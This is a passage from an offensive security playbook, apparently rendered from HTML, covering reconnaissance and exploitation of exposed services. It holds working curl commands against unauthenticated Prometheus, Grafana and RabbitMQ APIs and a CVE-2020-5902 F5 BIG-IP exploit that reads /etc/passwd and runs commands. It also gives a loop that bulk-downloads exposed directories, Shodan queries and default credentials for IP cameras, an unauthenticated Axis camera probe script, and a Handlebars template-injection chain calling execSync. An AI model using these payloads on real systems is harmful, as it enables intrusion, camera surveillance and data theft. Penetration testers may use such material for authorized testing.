&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. All sites from the same dev share the same flaws:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Same stack (Supabase + Lovable.dev)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Same broken-RLS patterns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Same APIs with open signup&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2618-exposed-prometheusgrafana" &gt;
&lt;div&gt;
&lt;a href="#2618-exposed-prometheusgrafana"&gt;
##
&lt;/a&gt;
26.18 Exposed Prometheus/Grafana
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Prometheus (port 9090) — internal metrics and targets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:9090/api/v1/targets&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# All monitored targets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:9090/api/v1/label/__name__/values&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# All metrics&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:9090/api/v1/query?query=up&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Status of all services&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Grafana (port 3000) — dashboards without auth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:3000/api/search&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# List all dashboards&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:3000/api/dashboards/home&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Main dashboard&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:3000/api/org&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Organization info&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# RabbitMQ management (port 15672)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:15672/api/overview&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# No auth → full access&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2619-f5-big-ip--cve-2020-5902-rce" &gt;
&lt;div&gt;
&lt;a href="#2619-f5-big-ip--cve-2020-5902-rce"&gt;
##
&lt;/a&gt;
26.19 F5 BIG-IP — CVE-2020-5902 RCE
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If you detect F5 BIG-IP (&lt;code&gt;TS*&lt;/code&gt; cookies, &lt;code&gt;BigIP&lt;/code&gt; server):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Detect F5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;server:\|set-cookie&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Server: BigIP, cookies TS01*, TSa*&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Test CVE-2020-5902 (CVSS 10.0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# File read:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# RCE:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+all&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2620-directory-listing--port-scanning-passive" &gt;
&lt;div&gt;
&lt;a href="#2620-directory-listing--port-scanning-passive"&gt;
##
&lt;/a&gt;
26.20 Directory Listing — Passive Port Scanning
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Servers with directory listing enabled expose ALL files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Common ports that may have directory listing:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; port in &lt;span style="color:#ef9f76"&gt;80&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;8080&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;8085&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;8443&lt;/span&gt; 9000; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;Port &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$port&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: %{size_download}b - %{http_code}\n&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$port&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it returns HTML with a file list → extract everything:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:8085/&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;href=&amp;#34;[^&amp;#34;]+&amp;#39;&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#34;&amp;#39;&lt;/span&gt; -f2 | &lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; f; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; !&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; !&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;..&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; curl -s -o &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:8085/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2621-ip-cameras--recon--exploitation" &gt;
&lt;div&gt;
&lt;a href="#2621-ip-cameras--recon--exploitation"&gt;
##
&lt;/a&gt;
26.21 IP Cameras — Recon &amp;amp; Exploitation
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;IP cameras are the most exposed class of IoT device on the Brazilian internet (~100K). Most expose endpoints that require no authentication.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Discovery via Shodan&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan stats --facets org:20 &lt;span style="color:#a6d189"&gt;&amp;#39;country:BR port:554&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan search &lt;span style="color:#a6d189"&gt;&amp;#39;country:BR port:554 has_screenshot:true&amp;#39;&lt;/span&gt; --limit &lt;span style="color:#ef9f76"&gt;100&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Axis: snapshot and MJPEG stream. Unauthenticated only when anonymous viewer access is enabled (port 80 by default; 8010 on the camera in the case below)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:8010/axis-cgi/jpg/image.cgi&amp;#34;&lt;/span&gt; -o snapshot.jpg
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:8010/axis-cgi/mjpg/video.cgi&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# MJPEG live stream&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Axis: full config dump (988 parameters on the camera below). /axis-cgi/admin/ normally demands admin credentials, so a 200 without them is the finding; a 401 means the admin API is at least gated&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:8010/axis-cgi/admin/param.cgi?action=list&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Serial, firmware, resolution, SD card, PTZ, licenses, network (key=value lines, e.g. root.Properties.System.SerialNumber)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. ONVIF: the device service is SOAP, so a plain GET says little. POST GetDeviceInformation; many cameras answer it without auth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP:80/onvif/device_service&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/soap+xml&amp;#34;&lt;/span&gt; \
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;s:Envelope xmlns:s=&amp;#34;http://www.w3.org/2003/05/soap-envelope&amp;#34;&amp;gt;&amp;lt;s:Body&amp;gt;&amp;lt;GetDeviceInformation xmlns=&amp;#34;http://www.onvif.org/ver10/device/wsdl&amp;#34;/&amp;gt;&amp;lt;/s:Body&amp;gt;&amp;lt;/s:Envelope&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Manufacturer, Model, FirmwareVersion, SerialNumber&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. RTSP stream (usually requires auth)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ffplay &lt;span style="color:#a6d189"&gt;&amp;#34;rtsp://IP:554/axis-media/media.amp&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 6. Intelbras / HNAP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP/info/Login.html&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Login page&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl &lt;span style="color:#a6d189"&gt;&amp;#34;http://IP/HNAP1/&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# HNAP API (GetDeviceSettings)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 7. Default credentials by manufacturer&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Axis: root/pass, root/admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Hikvision: admin/12345, admin/admin12345&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Dahua: admin/admin, admin/888888&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Intelbras: admin/admin, admin/(empty)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Foscam: admin/(empty)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Axis P1378-LE with 2019 firmware (6 years old):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Public snapshot without auth → real-time viewing&lt;/li&gt;
&lt;li&gt;Full config dump (988 parameters) with serial, licenses, SD card&lt;/li&gt;
&lt;li&gt;2 web interfaces (8010 Apache, 8011 Angular)&lt;/li&gt;
&lt;li&gt;99,428 cameras exposed in Brazil via Shodan&lt;/li&gt;
&lt;/ul&gt;
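&lt;p&gt;Steps 2 and 3 above, turned into a small unauthenticated-endpoint probe with a parser for the param.cgi dump. This is an added example, not code from the playbook or from Axis: the VAPIX paths are the ones listed above, the root.* key names are assumed from Axis parameter naming, and the sample dump is constructed. The point a curl one-liner hides is that a 200 is not enough: cameras often return a login page with status 200, so each probe validates the body (JPEG magic bytes for the snapshot, key=value lines for the dump) before it counts as a finding.&lt;/p&gt;

```python
"""Unauthenticated-endpoint triage for Axis cameras (added example, not from the playbook).

Assumptions: the VAPIX paths below are the ones the playbook lists; the key names in
INTERESTING follow Axis root.* parameter naming; SAMPLE_PARAMS is a constructed dump.
"""
import sys
import urllib.error
import urllib.request

# Each probe: path, a body check (a 200 that is really a login page must not count),
# and the impact statement for the report.
PROBES = {
    "snapshot": ("/axis-cgi/jpg/image.cgi",
                 lambda body: body[:2] == b"\xff\xd8",   # JPEG magic bytes
                 "live view readable without authentication"),
    "params":   ("/axis-cgi/admin/param.cgi?action=list",
                 lambda body: b"root." in body,          # VAPIX key=value dump
                 "admin parameter dump readable without authentication"),
}

# Keys worth pulling from a param.cgi dump into the report (assumed Axis naming).
INTERESTING = (
    "root.Brand.ProdNbr",
    "root.Properties.Firmware.Version",
    "root.Properties.System.SerialNumber",
    "root.Network.eth0.IPAddress",
)

# Constructed sample of what param.cgi?action=list returns (values are made up).
SAMPLE_PARAMS = """root.Brand.ProdNbr=P1378-LE
root.Properties.Firmware.Version=9.80.1
root.Properties.System.SerialNumber=ACCC8E000001
root.Network.eth0.IPAddress=192.0.2.10
root.Image.I0.Appearance.Resolution=1920x1080
"""


def http_fetch(url, timeout=5):
    """Real fetcher: returns (status, body); 401/403 come back as a status, not an exception."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, b""


def probe_unauthenticated(fetch, base_url):
    """Hit every probe through fetch(url) with no credentials; return [(name, impact), ...]."""
    findings = []
    for name, (path, looks_real, impact) in PROBES.items():
        status, body = fetch(base_url + path)
        if status == 200 and looks_real(body):
            findings.append((name, impact))
    return findings


def parse_axis_params(text):
    """Turn the key=value dump from param.cgi?action=list into a dict."""
    params = {}
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key:
            params[key] = value
    return params


def summarize_params(params):
    """Keep only the keys that belong in a report (model, firmware, serial, IP)."""
    return {key: params[key] for key in INTERESTING if key in params}


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) == 2 else "http://192.0.2.10:8010"
    hits = probe_unauthenticated(http_fetch, base)
    for name, impact in hits:
        print(f"[!] {name}: {impact}")
    if any(name == "params" for name, _ in hits):
        _, dump = http_fetch(base + PROBES["params"][0])
        for key, value in summarize_params(parse_axis_params(dump.decode(errors="replace"))).items():
            print(f"    {key} = {value}")
```

&lt;p&gt;Run it as &lt;code&gt;python3 axis_probe.py http://IP:8010&lt;/code&gt;; the fetch function is injectable so the same logic can be driven from a Shodan export or replayed against saved responses.&lt;/p&gt;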
&lt;h3 id="2622-sendgridemail-template-ssti-handlebars-injection" &gt;
&lt;div&gt;
&lt;a href="#2622-sendgridemail-template-ssti-handlebars-injection"&gt;
##
&lt;/a&gt;
26.22 SendGrid/Email Template SSTI (Handlebars Injection)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;SendGrid Dynamic Templates are written in Handlebars. If user input is concatenated into the template source (instead of being passed as template data), it is compiled as template code. The RCE chain below targets the Node.js &lt;code&gt;handlebars&lt;/code&gt; package and only applies where the application renders templates itself; newer releases block the prototype property access it relies on. When SendGrid renders the template on its side, the realistic impact is template injection (reading other template variables, injecting HTML into the mail) rather than code execution on your target.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Payload for RCE via Handlebars SSTI in email templates:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{constructor.constructor(&lt;span style="color:#a6d189"&gt;&amp;#39;return process.env&amp;#39;&lt;/span&gt;)()}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Full chain for command execution:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;s&amp;#34;&lt;/span&gt; as &lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;string&lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;e&amp;#34;&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; split as &lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;conslist&lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.pop}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.push (lookup string.sub &lt;span style="color:#a6d189"&gt;&amp;#34;constructor&amp;#34;&lt;/span&gt;)}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.pop}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; string.split as &lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;codelist&lt;span style="color:#99d1db;font-weight:bold"&gt;|&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.pop}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.push &lt;span style="color:#a6d189"&gt;&amp;#34;return require(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;whoami&amp;#39;)&amp;#34;&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;.pop}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;each conslist}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;#&lt;/span&gt;&lt;span style="color:#e78284"&gt;with&lt;/span&gt; (string.sub.apply &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt; codelist)}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#ca9ee6"&gt;this&lt;/span&gt;}}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/each}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{{&lt;span style="color:#e78284"&gt;/with}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2623-smtp-header-injection-via-api-0a-crlf" &gt;
&lt;div&gt;
&lt;a href="#2623-smtp-header-injection-via-api-0a-crlf"&gt;
##
&lt;/a&gt;
26.23 SMTP Header Injection via API (%0A CRLF)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Application endpoints that accept user-supplied addresses and forward them to a mail API or SMTP library without validation may allow header injection. The request below uses the SendGrid v3 shape; test both the application layer that builds it and the provider API it forwards to, since validation can live in either place:&lt;/p&gt;
